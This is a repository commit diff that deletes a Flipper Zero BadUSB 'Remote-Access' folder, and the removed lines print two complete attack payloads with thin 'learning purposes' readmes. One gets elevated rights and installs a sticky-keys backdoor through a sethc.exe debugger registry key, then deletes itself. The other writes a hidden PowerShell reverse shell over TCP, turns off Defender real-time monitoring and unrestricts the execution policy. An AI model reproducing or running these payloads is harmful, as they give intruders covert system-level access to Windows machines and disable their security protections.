STRLCPY/UNC0V3R3D_FlipperZero-BadUSB

Delete Remote-Access directory
Jonas committed with GitHub 1 year ago

f8995676

1 parent 16276bb7

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment,
3	-	REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr.
4	-	REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account.
5	-	REM Version: 1.0
6	-	REM Category: Remote_Access
7	-	REM plug in second USB in before the Flipper
8	-	DELAY 3000
9	-	CONTROL ESCAPE
10	-	DELAY 500
11	-	STRING notepad
12	-	DELAY 250
13	-	ENTER
14	-	DELAY 750
15	-	STRING @echo off
16	-	ENTER
17	-	STRING :init
18	-	ENTER
19	-	STRING setlocal DisableDelayedExpansion
20	-	ENTER
21	-	STRING set cmdInvoke=1
22	-	ENTER
23	-	STRING set winSysFolder=System32
24	-	ENTER
25	-	STRING set "batchPath=%~0"
26	-	ENTER
27	-	STRING for %%k in (%0) do set batchName=%%~nk
28	-	ENTER
29	-	STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs"
30	-	ENTER
31	-	STRING setlocal EnableDelayedExpansion
32	-	ENTER
33	-	STRING :checkPrivileges
34	-	ENTER
35	-	STRING NET FILE 1>NUL 2>NUL
36	-	ENTER
37	-	STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges)
38	-	ENTER
39	-	STRING :getPrivileges
40	-	ENTER
41	-	STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
42	-	ENTER
43	-	STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%"
44	-	ENTER
45	-	STRING echo args = "ELEV " >> "%TEMPVBS%"
46	-	ENTER
47	-	STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%"
48	-	ENTER
49	-	STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%"
50	-	ENTER
51	-	STRING echo Next>> "%TEMPVBS%"
52	-	ENTER
53	-	STRING if '%cmdInvoke%'=='1' goto InvokeCmd
54	-	ENTER
55	-	STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%"
56	-	ENTER
57	-	STRING goto ExecElevation
58	-	ENTER
59	-	STRING :InvokeCmd
60	-	ENTER
61	-	STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%"
62	-	ENTER
63	-	STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%"
64	-	ENTER
65	-	STRING :ExecElevation
66	-	ENTER
67	-	STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %*
68	-	ENTER
69	-	STRING exit /B
70	-	ENTER
71	-	STRING :gotPrivileges
72	-	ENTER
73	-	STRING setlocal & cd /d "%~dp0."
74	-	ENTER
75	-	STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1)
76	-	ENTER
77	-	STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end
78	-	ENTER
79	-	STRING cls
80	-	ENTER
81	-	STRING echo Payload Install Failed
82	-	ENTER
83	-	STRING pause
84	-	ENTER
85	-	STRING :end
86	-	ENTER
87	-	STRING del /F /Q "%~0" && exit
88	-	CONTROL s
89	-	DELAY 500
90	-	STRING %temp%\run.bat
91	-	TAB
92	-	STRING a
93	-	ENTER
94	-	DELAY 250
95	-	ALT F4
96	-	DELAY 250
97	-	CONTROL ESCAPE
98	-	DELAY 500
99	-	STRING %temp%\run.bat
100	-	ENTER

■ ■ ■ ■ ■ ■

Remote-Access/CommandLineBackdoor/readme.md

1	-
2	-	# CommandLineBackdoor
3	-	This script is for learning purposes only. I am not responsible for your actions and not going to help you with anything.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible.
8	-
9	-
10	-	## Features
11	-
12	-	- x
13	-
14	-	## Feedback
15	-
16	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
17	-
18	-
19	-
20	-
21	-
22	-
23	-	## Support
24	-
25	-	For support, contact me via Discord "UNC0V3R3D#8662".
26	-
27	-
28	-	## Meta
29	-
30	-
31	-	- If you want to sponsor me on Patreon, the link is on my profile.
32	-
33	-
34	-

■ ■ ■ ■ ■ ■

Remote-Access/ReversePowershell/ReversePowershell.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.
3	-	REM Version: 1.0
4	-	REM Category: Remote_Access
5	-	DELAY 750
6	-	GUI r
7	-	DELAY 1000
8	-	STRING powershell Start-Process notepad -Verb runAs
9	-	ENTER
10	-	DELAY 750
11	-	ALT y
12	-	DELAY 750
13	-	ENTER
14	-	ALT SPACE
15	-	DELAY 1000
16	-	STRING m
17	-	DELAY 1000
18	-	DOWNARROW
19	-	REPEAT 100
20	-	ENTER
21	-	STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255\|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 \| Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’
22	-	ENTER
23	-	DELAY 750
24	-	STRING Set-MpPreference -DisableRealtimeMonitoring $true
25	-	DELAY 500
26	-	ENTER
27	-	DELAY 750
28	-	STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
29	-	ENTER
30	-	STRING Remove-Item $MyINvocation.InvocationName
31	-	ENTER
32	-	CTRL s
33	-	DELAY 1000
34	-	STRING C:\Windows\config-34593.ps1
35	-	ENTER
36	-	DELAY 1000
37	-	ALT F4
38	-	DELAY 750
39	-	GUI r
40	-	DELAY 750
41	-	STRING powershell Start-Process cmd -Verb runAs
42	-	ENTER
43	-	DELAY 750
44	-	ALT y
45	-	DELAY 1000
46	-	STRING mode con:cols=14 lines=1
47	-	ENTER
48	-	ALT SPACE
49	-	DELAY 750
50	-	STRING m
51	-	DELAY 750
52	-	DOWNARROW
53	-	REPEAT 100
54	-	ENTER
55	-	STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
56	-	ENTER
57	-	DELAY 750
58	-	STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
59	-	ENTER
60	-

■ ■ ■ ■ ■ ■

Remote-Access/ReversePowershell/readme.md

1	-
2	-	# ReversePowershell
3	-	This script is for learning purposes only. I am not responsible for your actions and not going to help you with anything.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible.
8	-
9	-
10	-	## Features
11	-
12	-	- x
13	-
14	-	## Feedback
15	-
16	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
17	-
18	-
19	-
20	-
21	-
22	-
23	-	## Support
24	-
25	-	For support, contact me via Discord "UNC0V3R3D#8662".
26	-
27	-
28	-	## Meta
29	-
30	-
31	-	- If you want to sponsor me on Patreon, the link is on my profile.
32	-
33	-
34	-

Delete Remote-Access directory